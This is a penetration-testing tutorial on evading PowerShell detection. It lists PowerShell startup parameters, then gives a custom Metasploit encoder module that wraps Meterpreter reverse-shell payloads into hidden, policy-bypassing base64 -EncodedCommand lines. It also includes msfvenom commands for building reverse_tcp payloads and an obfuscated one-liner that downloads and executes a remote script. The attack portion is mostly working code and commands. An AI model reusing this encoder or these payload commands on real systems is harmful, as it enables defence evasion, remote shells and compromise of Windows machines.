Windows PowerShell is powerful and built into the OS, which makes it a natural tool during a penetration test; at the same time, security products have started to target every PowerShell behaviour with detection and blocking.
The documentation at https://technet.microsoft.com lists the following startup parameters:
Here is a listing of the available startup parameters:
-Command
Specifies the command text to execute as though it were typed at the PowerShell command prompt.
-EncodedCommand
Specifies the base64-encoded command text to execute.
-ExecutionPolicy
Sets the default execution policy for the console session.
-File
Sets the name of a script file to execute.
-InputFormat
Sets the format for data sent to PowerShell as either text string or serialized XML. The default format is XML. Valid values are text and XML.
-NoExit
Does not exit after running startup commands. This parameter is useful when you run PowerShell commands or scripts via the command prompt (cmd.exe).
-NoLogo
Starts the PowerShell console without displaying the copyright banner.
-NonInteractive
Starts the PowerShell console in non-interactive mode. In this mode, PowerShell does not present an interactive prompt to the user.
-NoProfile
Tells the PowerShell console not to load the current user's profile.
-OutputFormat
Sets the format for output as either text string or serialized XML. The default format is text. Valid values are text and XML.
-PSConsoleFile
Loads the specified Windows PowerShell console file. Console files end with the .psc1 extension and can be used to ensure that specific snap-in extensions are loaded and available. You can create a console file using Export-Console in Windows PowerShell.
-Sta
Starts PowerShell in single-threaded apartment mode.
-Version
Sets the version of Windows PowerShell to use for compatibility, such as 1.0.
-WindowStyle
Sets the window style as Normal, Minimized, Maximized, or Hidden. The default is Normal.
Given these features, a local test (a harmless command that pops a message box, to confirm the launch parameters behave as documented):
Add-Type -AssemblyName PresentationFramework;[System.Windows.MessageBox]::Show('Micropoor')
# Copy base64.rb to metasploit-framework/embedded/framework/modules/encoders/powershell. If the powershell directory does not exist, mkdir powershell.
# E.g.
# msf encoder(powershell/base64) > use exploit/multi/handler
# msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
# payload => windows/x64/meterpreter/reverse_tcp
# msf exploit(multi/handler) > exploit
# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xx -f psh-reflection --arch x64 --platform windows | msfvenom -e powershell/base64 --arch x64 --platform windows
# [*] Started reverse TCP handler on xx.1xx.xx.xx:xx
class MetasploitModule < Msf::Encoder
  Rank = NormalRanking

  def initialize
    super(
      'Name'        => 'Powershell Base64 Encoder',
      'Description' => %q{
        msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xx -f psh-reflection --arch x64 --platform windows | msfvenom -e powershell/base64 --arch x64 --platform windows.
      },
      'Author'      => 'Micropoor',
      'Arch'        => ARCH_CMD,
      'Platform'    => 'win')

    register_options([
      # When true, prepend "-windowstyle hidden -exec bypass -NoExit" to the command line
      OptBool.new('payload', [ false, 'Use payload ', false ]),
      # When true, use the SysWOW64 host explicitly (on 64-bit Windows that is the 32-bit powershell.exe)
      OptBool.new('x64', [ false, 'Use syswow64 powershell', false ])
    ])
  end

  # buf is the psh-reflection script produced by msfvenom. -EncodedCommand expects
  # base64 of the script as UTF-16LE, hence to_unicode before encode_base64.
  def encode_block(state, buf)
    base64 = Rex::Text.encode_base64(Rex::Text.to_unicode(buf))
    cmd = ''
    if datastore['x64']
      cmd += 'c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe '
    else
      cmd += 'powershell.exe '
    end
    if datastore['payload']
      cmd += '-windowstyle hidden -exec bypass -NoExit '
    end
    cmd += "-EncodedCommand #{base64}"
  end
end
# If using caidao, execute:
# echo powershell -windowstyle hidden -exec bypass -c \""IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.117/xxx.ps1');\"" |msfvenom -e x64/xor4 --arch x64 --platform windows
# where xxx.ps1 is the output of: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xx -f psh-reflection --arch x64 --platform windows | msfvenom -e powershell/base64 --arch x64 --platform windows